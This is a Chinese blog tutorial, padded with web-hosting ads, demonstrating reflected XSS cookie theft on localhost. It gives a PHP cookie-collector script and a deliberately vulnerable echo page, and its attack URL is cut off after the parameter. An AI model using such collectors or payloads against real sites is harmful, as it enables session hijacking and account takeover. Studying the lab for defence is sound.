这篇文章将为大家详细讲解有关XSS跨站如何获取cookie，小编觉得挺实用的，因此分享给大家做个参考，希望大家阅读完这篇文章后可以有所收获。

10年积累的成都网站建设、成都做网站经验，可以快速应对客户对网站的新想法和需求。提供各种问题对应的解决方案。让选择我们的客户得到更好、更有力的网络服务。我虽然不认识你，你也不认识我。但先网站制作后付款的网站建设流程，更有临泽免费网站建设让你可以放心的选择与我们合作。

仅用于参考学习

测试环境：hacker端  and  victim端

1，hacker端（hacker.php）的程序内容如下：

$cookie=$_GET['cookie'];

$file=fopen("cookie.txt","a");

fwrite($file,$cookie);

fclose($file)

?>

2，受害者端（victim.php）的程序内容如下：

$xss=@$_GET['xss_input'];

echo '你输入的字符为
'.$xss;

?>

3，hacker发给victim的payload语句如下：
http://localhost/victim.php?xss_input=
ps：第一次用的事件不是document.location，选择的是window.open事件，But，没有成功。更换浏览器也不照。

4，当victim点击hacker发送的链接后，Victim主机的cookie就被写入到hacker的cookie.txt文档中了，cookie信息也就因此丢失了，那么hacker久可以利用这个cookie信息针对victim做bulabula....

关于“XSS跨站如何获取cookie”这篇文章就分享到这里了，希望以上内容可以对大家有一定的帮助，使各位可以学到更多知识，如果觉得文章不错，请把它分享出去让更多的人看到。

另外有需要云服务器可以了解下创新互联scvps.cn，海内外云服务器15元起步，三天无理由+7*72小时售后在线，公司持有idc许可证，提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案，具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势，专为企业上云打造定制，能够满足用户丰富、多元化的应用场景需求。

新闻名称：XSS跨站如何获取cookie-创新互联
网页网址：http://scyingshan.cn/article/eohpi.html